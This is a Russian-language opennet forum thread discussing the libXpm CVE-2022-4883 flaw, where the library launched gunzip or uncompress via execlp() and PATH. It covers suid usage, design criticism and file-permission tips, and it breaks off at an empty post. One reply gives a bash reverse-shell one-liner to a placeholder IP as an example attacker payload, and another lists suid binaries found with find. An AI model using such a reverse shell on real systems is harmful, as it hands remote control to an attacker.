The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



"Уязвимость в libXpm, приводящая к выполнению кода"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от opennews (??), 21-Янв-23, 11:12 
Опубликован корректирующий выпуск библиотеки libXpm 3.5.15, развиваемой проектом X.Org и применяемой для обработки файлов в формате XPM. В новой версии устранены три уязвимости, две из которых (CVE-2022-46285, CVE-2022-44617) приводят к зацикливанию при обработке специально оформленных файлов XPM. Третья уязвимость (CVE-2022-4883) позволяет запустить произвольные команды при выполнении приложений, использующих libXpm. При запуске связанных с libXpm привилегированных процессов, например, программ с флагом suid root, уязвимость даёт возможность поднять свои привилегии...

Подробнее: https://www.opennet.me/opennews/art.shtml?num=58524

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения [Сортировка по времени | RSS]


1. "Уязвимость в libXpm, приводящая к выполнению кода"  +2 +/
Сообщение от Аноним (1), 21-Янв-23, 11:12 
> При запуске связанных с libXpm привилегированных процессов, например, программ с флагом suid root, уязвимость даёт возможность поднять свои привилегии.

Это кто такой умный ставит левым прогам суид-рут?!

Ответить | Правка | Наверх | Cообщить модератору

4. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (4), 21-Янв-23, 12:07 
Libxpm классика, которая может всплыть где угодно, раньше вроде в x-сервере использовалась.
Ответить | Правка | Наверх | Cообщить модератору

18. "Уязвимость в libXpm, приводящая к выполнению кода"  +2 +/
Сообщение от Аноним (1), 21-Янв-23, 14:12 
И много у тебя троянов внутри суидных прог?
Ответить | Правка | Наверх | Cообщить модератору

80. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (-), 22-Янв-23, 00:33 
> Libxpm классика, которая может всплыть где угодно, раньше вроде в x-сервере использовалась.

Вот в какой suid'ной программе она могла бы потребоваться? Даже если забыть о том что в линухе suid уже довольно давно считается "фи" и почти не используется.


Ответить | Правка | К родителю #4 | Наверх | Cообщить модератору

103. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (103), 22-Янв-23, 16:06 
Ну "почти" не почти, беру первый попавшийся сервер со свежайшим RHEL 9 и все еще вижу сьюды в рута в программах, которые используются постоянно в работающей системе, типа: mount/mount.nfs, unix_chkpwd, at, crontab, su, passwd/gpasswd, fusermount. Впрочем, полагаю что CAP_SETUID, позволяющий сменить uid на рута, это настолько сильная операция, что тут безопасности от отказа от сьюд почти и не будет (хотя какие-то эксплоиты, наверное, предотвратить можно).
Ответить | Правка | Наверх | Cообщить модератору

113. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (-), 24-Янв-23, 04:19 
> и все еще вижу сьюды в рута в программах, которые используются
> постоянно в работающей системе, типа: mount/mount.nfs, unix_chkpwd, at, crontab,
> su, passwd/gpasswd, fusermount.

И которой из них сабжа надо?

Ответить | Правка | Наверх | Cообщить модератору

49. "Уязвимость в libXpm, приводящая к выполнению кода"  +1 +/
Сообщение от dannyD (?), 21-Янв-23, 18:19 
>>Это кто такой умный ставит левым прогам суид-рут?!

а спроси.

ни кто не заметил, что даже если дать
~/.local/share/TelegramDesktop/log.txt root ro, то всё равно он переписывается ?

т.е. при запуске юзверькой прилоги переписываеся файл с доступом только рута.

вот меня это как-то напрягает.

Ответить | Правка | К родителю #1 | Наверх | Cообщить модератору

55. "Уязвимость в libXpm, приводящая к выполнению кода"  +2 +/
Сообщение от Аноним (1), 21-Янв-23, 19:57 
Потому что ты ничего не понимаешь. Права на каталог TelegramDesktop - чьи? Вот чьи права - тот и может удалять-добавлять файлы в этом каталоге. Что такое "переписать"? Старый файл - удаляется, новый - создаётся, обе операции зависят от прав на _каталог_.

Тебе нужен "закрепляющий бит": каталог с установленным sticky-битом означает, что удалить файл из этого каталога может только владелец файла или root. Не забывай, если выше ещё есть каталоги.

Ответить | Правка | Наверх | Cообщить модератору

56. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от dannyD (?), 21-Янв-23, 20:23 
спс

зы. я не админ, я оффтоп не люблю.
ззы. совсем не люблю.

Ответить | Правка | Наверх | Cообщить модератору

79. "Уязвимость в libXpm, приводящая к выполнению кода"  +1 +/
Сообщение от dannyD (?), 22-Янв-23, 00:31 
>>Потому что ты ничего не понимаешь.....
>>...нужен "закрепляющий бит": каталог с установленным sticky-битом означает,

а можно чиста каннеретна \../_ _\../

что сделать, чтоб в файле нулевой длины ~/.local/share/TelegramDesktop/log.txt

запускаемая программа (телеграм) ничего не могла записать или измемить?
т.е. задача блокировать ведение этого лога.

Ответить | Правка | К родителю #55 | Наверх | Cообщить модератору

100. "Уязвимость в libXpm, приводящая к выполнению кода"  +1 +/
Сообщение от Perlovka (ok), 22-Янв-23, 13:40 
Гугли setattr
Ответить | Правка | Наверх | Cообщить модератору

115. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (1), 24-Янв-23, 05:28 
> чтоб в файле нулевой длины ... запускаемая программа (телеграм) ничего не могла

частенько встречается такая задача, погасить неуёмное приложение. Инструменты все озвучены выше: закрепление и рут-владелец (и на группу тоже).

Ответить | Правка | К родителю #79 | Наверх | Cообщить модератору

119. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (119), 25-Янв-23, 04:59 
sudo chattr +ai /path/to/file

Ответить | Правка | К родителю #79 | Наверх | Cообщить модератору

64. "Уязвимость в libXpm, приводящая к выполнению кода"  +1 +/
Сообщение от Аноним (-), 21-Янв-23, 22:37 
> т.е. при запуске юзверькой прилоги переписываеся файл с доступом только рута.

А owner у него кто?

> вот меня это как-то напрягает.

Chattr +i ему поставь. Или если не хочется чтобы там что-то было, можно убрать файло, создать диру с этим именем, и если программа в принципе может после этого работать - ну, ой, в диру дописать что либо она уже не сможет. Получит "Is a directory" как отлуп.

Ответить | Правка | К родителю #49 | Наверх | Cообщить модератору

101. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от dannyD (?), 22-Янв-23, 14:08 
спс, разорбрался.

конкретно телеграмм отказывается запускаться с отбитым логом.

Ответить | Правка | Наверх | Cообщить модератору

107. "Уязвимость в libXpm, приводящая к выполнению кода"  +1 +/
Сообщение от ivan_erohin (?), 23-Янв-23, 17:15 
очень, очень наглый кусок дуровкода.
а если залинковать это в /dev/null:
$ rm -f -- ~/.local/share/TelegramDesktop/log.txt
$ ln -s ~/.local/share/TelegramDesktop/log.txt /dev/null
(и/или то же самое после запуска дуровграма)
что будет ?

ps: man socat вдруг появятся еще идеи.

Ответить | Правка | Наверх | Cообщить модератору

110. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от dannyD (?), 23-Янв-23, 22:12 
разумеется сслыка будет прибита, а на ёё месте будет новый файл.

PS. это первое, что было испробовано.

Ответить | Правка | Наверх | Cообщить модератору

111. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от dannyD (?), 23-Янв-23, 22:19 
тоже самое с ~/.xsession-errors от lightdm

лечится ковырянием сырца с переносом в /tmp который на tmpfs

Ответить | Правка | К родителю #107 | Наверх | Cообщить модератору

114. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (-), 24-Янв-23, 04:23 
> конкретно телеграмм отказывается запускаться с отбитым логом.

Ггг лол, ну, я бы если пользовался этим крапом вгрузил бы LD_PRELOAD'ом libfxxxoff.so - который так то open() с вон тем аргументом как-бы сделает. Теоретически. Практически, делать что-то с файлами в фс при этом совершенно не обязательно, только имитировать что все прокатило. Можно подумать, оно еще и проверять содержимое будет. Главное грамотно с314ть что все збс :)

Ответить | Правка | К родителю #101 | Наверх | Cообщить модератору

116. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от dannyD (?), 24-Янв-23, 07:48 
нихтфирштейн.
Ответить | Правка | Наверх | Cообщить модератору

2. "Уязвимость в libXpm, приводящая к выполнению кода"  +6 +/
Сообщение от Аноним (1), 21-Янв-23, 11:13 
> Атака сводится к размещению в доступном пользователю каталоге, присутствующем в списке PATH, собственных исполняемых файлов

Ну а это вообще жесть :)

Ответить | Правка | Наверх | Cообщить модератору

3. "Уязвимость в libXpm, приводящая к выполнению кода"  +3 +/
Сообщение от Аноним (3), 21-Янв-23, 12:01 
По сути, не отличается от подмены утилиты или библиотеки на левую. Вы обречены.
Ответить | Правка | Наверх | Cообщить модератору

19. "Уязвимость в libXpm, приводящая к выполнению кода"  –1 +/
Сообщение от Аноним (1), 21-Янв-23, 14:14 
> не отличается от подмены утилиты или библиотеки на левую

Вот с этого и надо было статью начинать: "сначала надо подменить систему".

Ответить | Правка | Наверх | Cообщить модератору

11. "Уязвимость в libXpm, приводящая к выполнению кода"  +5 +/
Сообщение от An onymous (?), 21-Янв-23, 12:43 
warning! Пользователь может запустить под собой какую-то программу!
Ответить | Правка | К родителю #2 | Наверх | Cообщить модератору

40. "Уязвимость в libXpm, приводящая к выполнению кода"  +1 +/
Сообщение от Аноним (40), 21-Янв-23, 16:34 
Warning. Программа с suid бит может запустить под root какую-то программу вместо gzip
Ответить | Правка | Наверх | Cообщить модератору

47. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Admino (ok), 21-Янв-23, 18:00 
А что за программа-то?
Ответить | Правка | Наверх | Cообщить модератору

51. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от OpenEcho (?), 21-Янв-23, 18:36 
> А что за программа-то?

    bash -i >& /dev/udp/1.2.3.4/1337 0>&1

Ответить | Правка | Наверх | Cообщить модератору

54. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Admino (ok), 21-Янв-23, 19:38 
С правами рута и с использованием libXpm?

Отсыпь.

Ответить | Правка | Наверх | Cообщить модератору

108. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от OpenEcho (?), 23-Янв-23, 19:35 
> Отсыпь.

Но, тебе уже и так хватит :)

Но если хочешь чтоб быстрей отпустило, дай доступ на ограниченый экаунт в которм суидишная компроментированная/вулнерабная прожка есть

Ответить | Правка | Наверх | Cообщить модератору

109. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Admino (ok), 23-Янв-23, 19:45 
Так вот мне и интересно было, где это в дистрибутивах встречается графическая тулза с суидом и libXpm.
Ответить | Правка | Наверх | Cообщить модератору

117. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от OpenEcho (?), 25-Янв-23, 00:03 
> Так вот мне и интересно было, где это в дистрибутивах встречается графическая
> тулза с суидом и libXpm.

А-а-а, вы о этом, сори, не понял... к сожалению помимо безобидного текстового XPM, есть еще

```
<xmp>

find . -perm /6000
./usr/bin/fusermount3
./usr/bin/wall
./usr/bin/passwd
./usr/bin/newgrp
./usr/bin/gpasswd
./usr/bin/chsh
./usr/bin/su
./usr/bin/expiry
./usr/bin/mount
./usr/bin/umount
./usr/bin/sudo
./usr/bin/mlocate
./usr/bin/chage
./usr/bin/ssh-agent
./usr/bin/write.ul
./usr/bin/dotlockfile
./usr/bin/crontab
./usr/bin/chfn
./usr/sbin/unix_chkpwd
./usr/lib/dbus-1.0/dbus-daemon-launch-helper
./usr/lib/x86_64-linux-gnu/utempter/utempter
./usr/lib/openssh/ssh-keysign
./usr/local/share/fonts
./run/log/journal
./var/log/journal
./var/log/journal/0289d16f3787f03a0475a594054e4e77
./var/mail
./var/local

</xmp>
```

Ответить | Правка | Наверх | Cообщить модератору

118. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Admino (ok), 25-Янв-23, 00:08 
Зачем ты привёл кучу текстовых утилит, которые к libXpm никаким боком отношения не имеют? Не говоря уже про логи?

Ты ChatGPT, что ли?

Ответить | Правка | Наверх | Cообщить модератору

121. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от OpenEcho (?), 25-Янв-23, 19:55 
> Зачем ты привёл кучу текстовых утилит,

Это /usr/bin/passwd текстовая утилита ?

> которые к libXpm никаким боком отношения не имеют?

А мы разве не отошли он libXPM и говорим про программы которые работают под SUID/GUID ?

>Не говоря уже про логи?

Это не логи, это выхлоп от

find . -perm /6000

который в данном случае искал на ванильном дебиане все программы от корня на которых установлен SUID/GUID

> Ты ChatGPT, что ли?

Платить калеки ChatGPT чтоб развлекать местных анонимов?! А вы батенька шутник...

Ответить | Правка | Наверх | Cообщить модератору

122. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Admino (ok), 25-Янв-23, 20:01 
> Это /usr/bin/passwd текстовая утилита ?

Это троллинг тупостью? Да, /usr/bin/passwd - это текстовая утилита.

> А мы разве не отошли он libXPM и говорим про программы которые
> работают под SUID/GUID ?

Для эксплуатации уязвимости требуется а) программа, использующая libXpm и б) программа, имеющая suid бит.

Условия а) и б) должны выполняться одновременно.

Я таких программ в современном дистрибутиве не нашёл. Теперь ты мне приводишь вывод find, в котором логи и куча консольщины. Зачем?

> Это не логи, это выхлоп от
> find . -perm /6000
> который в данном случае искал на ванильном дебиане все программы от корня
> на которых установлен SUID/GUID

И нашёл логи, потому что там на каталогах SGID.

Ответить | Правка | Наверх | Cообщить модератору

123. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от OpenEcho (?), 26-Янв-23, 00:28 
> Это троллинг тупостью? Да, /usr/bin/passwd - это текстовая утилита.

О-о-о, понятно, еще один умный пуп, ну-ну  смакуй дальше сам какой ты "умный"

Ответить | Правка | Наверх | Cообщить модератору

5. "Уязвимость в libXpm, приводящая к выполнению кода"  –7 +/
Сообщение от Аноним (5), 21-Янв-23, 12:11 
Ядро - одна большая чёрная дырка. Остальные проги тоже, даже sudo который со времён мамонтов, дырявый до сих пор. ОпенБСД занесли за бэкдоры и дырки, тоже не секрет и очень давно уже.

Ну т.е., вся наша вера в жопарукий-сорс - тлен.. Успокаивает порой лишь что wine хоть работает, и то слава богу, ну хоть одна хорошая новость. Как жить то теперь?

Ответить | Правка | Наверх | Cообщить модератору

6. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (6), 21-Янв-23, 12:22 
Без таких нытиков как ты - нормально жить
Ответить | Правка | Наверх | Cообщить модератору

9. "Уязвимость в libXpm, приводящая к выполнению кода"  +4 +/
Сообщение от деанон (?), 21-Янв-23, 12:39 
Зуммер узнал, что мир не идеален
Ответить | Правка | К родителю #5 | Наверх | Cообщить модератору

12. "Уязвимость в libXpm, приводящая к выполнению кода"  –1 +/
Сообщение от Аноним (5), 21-Янв-23, 12:50 
Да откудаж вы рождаетесь то инородные такие, что аж каждый вдох и выдох это уже полноценный вывод.
Кто-то прав, вас уже многова-то..
Ответить | Правка | Наверх | Cообщить модератору

10. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (10), 21-Янв-23, 12:41 
Хорошо жить на Винде 11
Ответить | Правка | К родителю #5 | Наверх | Cообщить модератору

13. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Анатолий Цыбин (ok), 21-Янв-23, 12:52 
Естественно, ведь на Винде нет дыр. Весь мир знает, что Майкрософт -- это фирма от самого бога, в которой работают трудолюбивейшие как Стаханов и умнейшие как Эйнштейн специалисты. Они любят пользователя и заботятся о нём, поэтому не допущают никаких дыр, никаких уязвимостей в принципе.
Те, кто попадают в рай, являются свидетелями того, что у самого бога стоит Винда.
А кто попадает в ад... Ну, не будем о плохом. =)
Ответить | Правка | Наверх | Cообщить модератору

35. "Уязвимость в libXpm, приводящая к выполнению кода"  +3 +/
Сообщение от Аноним (35), 21-Янв-23, 15:14 
Ну не просто же так в линуксе демоны
Ответить | Правка | Наверх | Cообщить модератору

46. "Уязвимость в libXpm, приводящая к выполнению кода"  +4 +/
Сообщение от Admino (ok), 21-Янв-23, 17:59 
И зомби.

И в винде иконки и службы.

Ответить | Правка | Наверх | Cообщить модератору

15. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (15), 21-Янв-23, 13:12 
А в стенах камеры ещё.
Ответить | Правка | К родителю #5 | Наверх | Cообщить модератору

65. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (-), 21-Янв-23, 22:39 
> Ядро - одна большая чёрная дырка.

Ога, блин, выполняет запросы программ, такое сякое. Если запросы программ не выполнять - знаете как хакеры обломаются?! Кстати это работает. Скажем, у меня есть библа которая заворачивает попытки файлы открывать. Программы очень прикольно обижаются когда им почти ничего открыть не дают. Правда далеко не все их них потом работать согласны.

Ответить | Правка | К родителю #5 | Наверх | Cообщить модератору

82. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (-), 22-Янв-23, 00:39 
> Ну т.е., вся наша вера в жопарукий-сорс - тлен.. Успокаивает порой лишь
> что wine хоть работает, и то слава богу,

Так что можно позапускать и виндовые трояны милые сердцу прожженого маздайца? Тут уж кому что.

Ответить | Правка | К родителю #5 | Наверх | Cообщить модератору

14. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Ананоним (?), 21-Янв-23, 13:08 
Ну они скоро подарят всяким докерам фичу невозможности пользователю менять переменную PATH. Скажите переменным окружения прощай! Депрекатед!
Ответить | Правка | Наверх | Cообщить модератору

20. "Уязвимость в libXpm, приводящая к выполнению кода"  +3 +/
Сообщение от Аноним (1), 21-Янв-23, 14:17 
Да пусть меняет PATH, сколько влезет. Вопрос в другом: какого фига разрешено недоверенному юзеру запускать что-то оттуда, куда он имеет права на запись? Админ локалхоста забыл про noexec?
Ответить | Правка | Наверх | Cообщить модератору

33. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Омномним (?), 21-Янв-23, 15:07 
Да не, ну это херня, у меня другой вопрос: каким образом этот юзер себе suid root-то организует?
А так - ну запускает непривилигерованный юзер что-то, в чём проблема-то? :)
Ответить | Правка | Наверх | Cообщить модератору

41. "Уязвимость в libXpm, приводящая к выполнению кода"  +1 +/
Сообщение от GOrilla (?), 21-Янв-23, 16:42 
Как это в чем? А эксплоит запускает тогда что. Шелл хостинги не дают запускать из хоумов.
Ответить | Правка | Наверх | Cообщить модератору

16. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от InuYasha (??), 21-Янв-23, 13:25 
> при помощи вызова execlp() запускает внешние утилиты

Ну это вообще... смузикод из 80ых что-ли? system("gzip my shit"); А всё потому что нет нормального LinAPI?

Если кто будет возмущаться, я тоже делал exec для всяких костылей, и знаю, что иногда надо, но это грязный хак, и не в проде же )

Ответить | Правка | Наверх | Cообщить модератору

21. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (21), 21-Янв-23, 14:19 
> А всё потому что нет нормального LinAPI?

А как ты себе это представляешь в принципе? Абсолютно все утилиты на компе должны идти с lib<util_name>.so и каждая утилита должна линковаться с каждой библиотекой другой утилиты?

Ответить | Правка | Наверх | Cообщить модератору

27. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (40), 21-Янв-23, 14:52 
В Винде можно dll связать с другой dll.
В java можно динамически загружать нативные библиотеки.
Почему в libxpm нельзя как то так?

Или просто скопипастить код распаковки в исходный код lixpm и не запускать неизвестно какие исполняемые файлы

Ответить | Правка | Наверх | Cообщить модератору

53. "Уязвимость в libXpm, приводящая к выполнению кода"  +1 +/
Сообщение от Аноним (21), 21-Янв-23, 19:14 
> В java можно динамически загружать нативные библиотеки.

Офигеть, вот это круто! Это dlopen() что-ли?

Ответить | Правка | Наверх | Cообщить модератору

95. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (10), 22-Янв-23, 10:40 
System.loadLibrary
Ответить | Правка | Наверх | Cообщить модератору

57. "Уязвимость в libXpm, приводящая к выполнению кода"  +1 +/
Сообщение от Sw00p aka Jerom (?), 21-Янв-23, 20:38 
ну вон в винде дллки также инжектят разница-то в чем?
Ответить | Правка | К родителю #27 | Наверх | Cообщить модератору

63. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (63), 21-Янв-23, 22:34 
Потому что unix это не винда
Ответить | Правка | К родителю #27 | Наверх | Cообщить модератору

71. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (-), 21-Янв-23, 22:47 
> В Винде можно dll связать с другой dll.

В Linux тоже так можно. И чего?

> В java можно динамически загружать нативные библиотеки.

Да охренеть! В нативных программах, только подумайте, тоже.

> Почему в libxpm нельзя как то так?

При желании можно. Просто видимо авторы были ленивые и это показалось им сложнее чем вон то. А чо, в винде тоже можно CreateProcess* сделать из либы если захотеть.

> Или просто скопипастить код распаковки в исходный код lixpm и не запускать
> неизвестно какие исполняемые файлы

Справедливости ради - найти программу которую еще и огреть вон тем удастся придется постараться.

Ответить | Правка | К родителю #27 | Наверх | Cообщить модератору

29. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от InuYasha (??), 21-Янв-23, 14:55 
В идеальном мире - примерно да. Функции, алгоритмы, код - в ДЛЛках, CLI и фронтенд - на чём хочешь. А если вспомнить rundll32, то, с натяжкой, КЛИ у нас уже готов... )
Конкретно по сабжу - я реально удивлён что там не подключили какую-нибудь библиотеку.
Ответить | Правка | К родителю #21 | Наверх | Cообщить модератору

45. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (45), 21-Янв-23, 17:13 
В данном случае распаковка не является задачей libXpm. Программа может напрямую вызвать zlib, и разжатые данные передать libXpm
Ответить | Правка | К родителю #21 | Наверх | Cообщить модератору

70. "Уязвимость в libXpm, приводящая к выполнению кода"  +2 +/
Сообщение от Аноним (70), 21-Янв-23, 22:45 
В полноценных операционных системах еще с 90х годов у каждой программы нужные библиотеки лежат в каталоге с этой самой программой и только общесистемные лежат в каталоге операционной системы, где-нибудь в C:\OS2\DLL или C:\Windows\System32.
Ответить | Правка | К родителю #21 | Наверх | Cообщить модератору

17. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от InuYasha (??), 21-Янв-23, 13:30 
Гос.пади, xpm - это битмапы в формате сишного массива что-ли? JSON и смузихлёбство из прошлого века? Всю жизнь его ненавидел. Зато проприетарасты его обожают.
Ответить | Правка | Наверх | Cообщить модератору

22. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (21), 21-Янв-23, 14:20 
И я его обожаю. В CDE божественные xpm'ные иконки
Ответить | Правка | Наверх | Cообщить модератору

92. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (92), 22-Янв-23, 09:47 
А если бы они были png'шные, было бы не то?
Ответить | Правка | Наверх | Cообщить модератору

99. "Уязвимость в libXpm, приводящая к выполнению кода"  +2 +/
Сообщение от Аноним (21), 22-Янв-23, 13:32 
ощущения не те
Ответить | Правка | Наверх | Cообщить модератору

23. "Уязвимость в libXpm, приводящая к выполнению кода"  +2 +/
Сообщение от Аноним (1), 21-Янв-23, 14:24 
Дело не в xpm, а что тебе кто-то может ls, например, подменить, а ты потом sudo ls сделаешь (это так, для наглядности, про что "уязвимость").
Ответить | Правка | К родителю #17 | Наверх | Cообщить модератору

26. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от InuYasha (??), 21-Янв-23, 14:51 
Да это-то понятно. Просто вспомнил, что xpm такое. Пока у тебя диск завален xpm-ками - это всё смешно, а, вот, когда у тебя бинарники со вSHITыми в виде данных (а не, хотя бы, ресурсов) картинками - вообще грусть. Особенно если это прошивки какие-нибудь.
Ответить | Правка | Наверх | Cообщить модератору

24. "Уязвимость в libXpm, приводящая к выполнению кода"  –2 +/
Сообщение от Аноним (40), 21-Янв-23, 14:42 
>Уязвимость вызвана особенностью работы libXpm со сжатыми файлами XPM - при обработке файлов XPM.Z или XPM.gz библиотека при помощи вызова execlp() запускает внешние утилиты распаковки (uncompress или gunzip)

Очень хорошая архитектура, настоящие программисты на си, превзошли сами себя

Ответить | Правка | Наверх | Cообщить модератору

32. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (40), 21-Янв-23, 15:07 
Хотя я тоже писала код запускающий внешний исполняемый файл для ковертации, который в прод работает.
Но там ни путь ни параметры от пользователя не приходят.
Ответить | Правка | Наверх | Cообщить модератору

48. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (21), 21-Янв-23, 18:05 
> Очень хорошая архитектура, настоящие программисты на си, превзошли сами себя

А что не так? У вас там в расте особенности работы с памятью, а у нас особенность работы с libXpm

Ответить | Правка | К родителю #24 | Наверх | Cообщить модератору

66. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (63), 21-Янв-23, 22:40 
> Очень хорошая архитектура

Верно, классическая UNIX, позволяет менять алгоритм сжатия без изменения кода приложения и перекомпиляции.

Ответить | Правка | К родителю #24 | Наверх | Cообщить модератору

94. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (10), 22-Янв-23, 10:36 
Менять алгоритм сжатия на запуск произвольного кода?
Ответить | Правка | Наверх | Cообщить модератору

106. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от kusb (?), 23-Янв-23, 14:43 
Может быть истинно понятная и безопасная ОС и должна так работать, без всяких шуток.
Ответить | Правка | К родителю #24 | Наверх | Cообщить модератору

25. "Уязвимость в libXpm, приводящая к выполнению кода"  –2 +/
Сообщение от Аноним (25), 21-Янв-23, 14:44 
>запускает внешние утилиты распаковки (uncompress или gunzip)

Вон из профессии за такое решение.

>Уязвимость устранена заменой вызова execlp на execl с использованием абсолютных путей к утилитам

Вон из профессии за такой фикс.

Ответить | Правка | Наверх | Cообщить модератору

36. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (36), 21-Янв-23, 15:28 
А если бы они использовали другой язык проблем было бы ещё больше. В том числе с программистами и их решениями.
Ответить | Правка | Наверх | Cообщить модератору

39. "Уязвимость в libXpm, приводящая к выполнению кода"  –1 +/
Сообщение от Аноним (39), 21-Янв-23, 16:27 
Какой нахрен другой язык, им дали zlib - нет "хочу дёргать exec". Необучаемые.
Ответить | Правка | Наверх | Cообщить модератору

75. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (75), 21-Янв-23, 23:34 
Положить zlib.so в PATH. Повторить эксперимент
Ответить | Правка | Наверх | Cообщить модератору

77. "Уязвимость в libXpm, приводящая к выполнению кода"  +1 +/
Сообщение от Аноним (21), 21-Янв-23, 23:36 
ldconfig использует $PATH?
Ответить | Правка | Наверх | Cообщить модератору

68. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (63), 21-Янв-23, 22:41 
Давай tar ещё выгони, дурик.
Ответить | Правка | К родителю #25 | Наверх | Cообщить модератору

96. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (96), 22-Янв-23, 10:47 
tar давно ффтопку, ибо его разрабы не понимают в архитектуре и делали его абы-как и в результате он выглядит как неудобное в использовании нагромождение говна. Рано или поздно всё это говно придётся разгребать и делать по-человечески. Только почему опять мне?
Ответить | Правка | Наверх | Cообщить модератору

30. "Уязвимость в libXpm, приводящая к выполнению кода"  +2 +/
Сообщение от Омномним (?), 21-Янв-23, 15:03 
при обработке файлов XPM.Z или XPM.gz библиотека при помощи вызова execlp() запускает внешние утилиты распаковки

А libz поюзать вообще не судьба была?

Ответить | Правка | Наверх | Cообщить модератору

34. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (34), 21-Янв-23, 15:11 
Ну, тогда бы сейчас бы читали новость об очередном переполнении int и выходы за пределы буфера.
Ответить | Правка | Наверх | Cообщить модератору

37. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (36), 21-Янв-23, 15:29 
Выходить? Не надо так.
Ответить | Правка | Наверх | Cообщить модератору

112. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Омномним (?), 24-Янв-23, 00:11 
Пока что только новость о выходе за пределы сознания.
Ответить | Правка | К родителю #34 | Наверх | Cообщить модератору

38. "Уязвимость в libXpm, приводящая к выполнению кода"  +2 +/
Сообщение от Анонн (?), 21-Янв-23, 16:15 
Офигенный код и офигенный фикс...
Кто там пыхеров и жсников за eval ругал? Ваш выход!
Ответить | Правка | Наверх | Cообщить модератору

44. "Уязвимость в libXpm, приводящая к выполнению кода"  +1 +/
Сообщение от Аноним (44), 21-Янв-23, 17:12 
В это проблема GNU/Xorg библиотек. Десятки тысяч исходных кодов, которые не верифицировались и не обновлялись на протяжении, например 11 лет! 20 лет! да там есть и такое.
Ответить | Правка | Наверх | Cообщить модератору

97. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (96), 22-Янв-23, 10:48 
У вейланда другая проблема - падает и глючит.
Ответить | Правка | Наверх | Cообщить модератору

105. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (105), 23-Янв-23, 13:08 
>GNU/Xorg

Конечно, FSF был бы не против этого.

Ответить | Правка | К родителю #44 | Наверх | Cообщить модератору

43. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Аноним (44), 21-Янв-23, 17:09 
А ведь можно было использовать библиотеки реализующие декомпрессию z/gz и не вызывать в коде библиотеки (библиотеки!!) внешние исполняемые файлы.
Ответить | Правка | Наверх | Cообщить модератору

60. "Уязвимость в libXpm, приводящая к выполнению кода"  +2 +/
Сообщение от Аноним (3), 21-Янв-23, 21:10 
Юникс вэй. Утилита > утилита > утилита.
Ответить | Правка | Наверх | Cообщить модератору

72. "Уязвимость в libXpm, приводящая к выполнению кода"  +1 +/
